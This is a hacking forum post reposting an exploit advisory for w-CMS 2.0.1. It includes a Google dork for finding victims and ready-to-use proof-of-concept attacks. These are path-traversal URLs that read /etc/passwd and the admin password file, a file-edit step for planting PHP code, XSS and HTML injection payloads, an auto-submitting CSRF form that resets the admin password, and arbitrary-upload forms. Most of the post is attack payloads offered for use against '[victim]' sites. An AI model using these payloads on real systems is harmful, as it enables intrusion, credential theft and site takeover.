[w-CMS 2.0.1] Multiples Vulnerabilidades PHP

  • 0 Respuestas
  • 3020 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Kodeinfect

  • *
  • Ex-Staff
  • *****
  • Mensajes: 325
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Kodeinfect's Blog

[w-CMS 2.0.1] Multiples Vulnerabilidades PHP

  • en: Abril 06, 2012, 12:55:35 pm
Código: [Seleccionar]
+----------------------------------------------------------------------+
|            ____  _            _           _____ _____                |
|           |  _ \| |          | |         |_   _|  __ \               |
|           | |_) | | __ _  ___| | __  _____ | | | |  | |              |
|           |  _ <| |/ _` |/ __| |/ / |_____|| | | |  | |              |
|           | |_) | | (_| | (__|   <        _| |_| |__| |              |
|           |____/|_|\__,_|\___|_|\_\      |_____|_____/               |
|                                                                      |
|/********************************************************************\|
|                                                                      |
  • Exploit Title: w-CMS 2.0.1 Multiple Vulnerabilities             |[/li][/list]
  • Google Dork: intext:"Powered by w-CMS"                          |[/li][/list]
  • Version    : 2.0.1                                              |[/li][/list]
  • WebSite    : http://w-cms.org/                                  |[/li][/list]
  • Software Link: http://wcms.googlecode.com/files/wcms-2.01.zip   |[/li][/list]
  • Author: Black-ID                                                |[/li][/list]
  • Tested on: Win Xp/7 Linux Uubuntu 10.04                         |[/li][/list]
  • Platform: Php                                                   |[/li][/list]
  • Risk      : High                                                |[/li][/list]
    +----------------------------------------------------------------------+
     PoC/Exploit:
     
    1.# Local File Disclosure [LFD]
     
    ~ [PoC]Http://[victim]/path/?p=../../../../../../boot.ini
    ~ [PoC]Http://[victim]/path/index.php?p=../../../../../../boot.ini
    ~ [PoC]Http://[victim]/path/?p=../../../../../../etc/passwd
    ~ [PoC]Http://[victim]/path/index.php?p=../../../../../../etc/passwd
    # Admin Pass Disclosure
    ~ [PoC]Http://[victim]/path/index.php?p=../../password
     
    +----------------------------------------------------------------------+
     
    2.# Local File Edit/Write
    ~ [PoC]Http://[victim]/admin.php?edit=../../../dz0.php
     
    Just Fill The Text Area With Evil Code (Php) & Click Save
     
    +----------------------------------------------------------------------+
     
    3.# Cross Site Scripting (XSS)
     
    ~ [PoC]Http://[victim]/path/?p=<script>alert('Dz0')</script>
    ~ [PoC]Http://[victim]/path/index.php?p=<script>alert('Dz0')</script>
     
    +----------------------------------------------------------------------+
     
    4.# Html Code Injection
    ~ [PoC]Http://[victim]/path/(Guestbook Path)Or(Contact Path)
    You Can Inject Html Code In The text Area
    Exapmle : <H3>Own3d</H3>
    ++ You Can Inject Xss Too
    Exapmle : <script>alert('Dz0')</script>
     
    +----------------------------------------------------------------------+
     
    5.# Cross Site Request Forgny (CSRF) Admin Change Pass
     
     
    ~ [PoC] Inject This Evil Code In Contact Form
     
    <html>
    <head>
    <title>Test</title>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
     
    <SCRIPT LANGUAGE="JavaScript"><!--
    setTimeout('document.test.submit()',0);
    //--></SCRIPT>
     
    </head>
     
    <body>
    <form name="test" id="form1" method="post" action="http://localhost/wcms-2.01/admin.php?settings=password"><!-- Target Site -->
      <p>
        <input name="password1" type="text" value="dz0" /><!-- New Password -->
        <input name="password2" type="text" value="dz0"/><!-- Confirm Password -->
      </p>
      <p><input type="submit" name="Change" value="Change" />
       </p>
    </form>
    </body>
    </html>
     
     
    +----------------------------------------------------------------------+
     
    6.# Arbitary File Upload
    ~ [PoC]Http://[victim]/admin.php
     
    # Add Folder
    <form action='Http://[victim]/path/admin.php' method='post'><input type='hidden' name='files' value='folders' /><h2>
        Update Folders</h2><div class='left'>
                      Folder Name</div>
                      <div class='right'>
                      <input name='newfolder' value='' /><br /><input style='width: auto;' class='button' type='submit' value='Add' /></form>
     
     
    # Upload File
     
    <form class='P10' action='Http://[victim]/admin.php' method='post' enctype='multipart/form-data'>
    <input type='hidden' name='files' value='upload' />
    <h2>Upload Files</h2>
    <p><b>Folder:</b> <select name='folder'><option value='Dz'>Dz</option></p><p>
    <div id='settings'>
    <div class='left'>
    <p>Files</p>
     
    </div>
    <div class='right'>
    <input type='file' name='file[]' class='multi' accept='gif|jpg|png|bmp|zip|pdf|txt|doc|docx|xlsx|mp3|swf' /><div class='MultiFile-wrap' id='MultiFile5_wrap'><input style='position: absolute; top: -3000px;' name='' class='multi MultiFile-applied' accept='gif|jpg|png|bmp|zip|pdf|txt|doc|docx|xlsx|mp3|swf' type='file' /><div class='MultiFile-list' id='MultiFile5_wrap_list'></div><div class='MultiFile-label'>
    <input style='width: auto;' class='button' type='submit' value='Upload' />
    </div></div></form>
     
     
    +----------------------------------------------------------------------+
    |       
  • Greetz   : Hidden Pain - Liyan Oz - Kedans Dz - Ddos-Dz    |[/li][/list]
    |                                                                      |
    |       BaC.Dz - Killer-Dz - Cyb3r-DZ - Ev!LsCr!pT_Dz - Th3 Viper      |
    |                                                                      |
    |       BLaCk_SPECTRE - Kha&miX - Damane2011 - YaSmouh - ra3ch         |
    |                                                                      |
    |       
  • Special 10x: Sec4Ever.Com - xDZx Team - Is-Sec.Org         |[/li][/list]
    +----------------------------------------------------------------------+
« Última modificación: Julio 28, 2014, 01:00:33 pm por Expermicid »

 

Flunym0us 2.0 - Escáner de vulnerabilidades para WordPress y Moodle

Iniciado por Pr0ph3t

Respuestas: 2
Vistas: 4027
Último mensaje Octubre 10, 2012, 12:57:40 pm
por Pr0ph3t
Joomscan: Escanner De Vulnerabilidades Para Joomla

Iniciado por DeuSer

Respuestas: 0
Vistas: 2863
Último mensaje Marzo 25, 2010, 07:53:09 pm
por DeuSer
[JoomlaScan v1.4] Scanner de vulnerabilidades para Joomla

Iniciado por Stiuvert

Respuestas: 8
Vistas: 6502
Último mensaje Septiembre 13, 2013, 11:43:17 pm
por Osw1re
Wapiti – Escaner De Vulnerabilidades En Aplicaciones Web

Iniciado por DeuSer

Respuestas: 0
Vistas: 2904
Último mensaje Marzo 25, 2010, 07:21:45 pm
por DeuSer
Buscando vulnerabilidades con WPSFp

Iniciado por Aryenal.Bt

Respuestas: 0
Vistas: 2614
Último mensaje Julio 16, 2012, 12:32:24 am
por Aryenal.Bt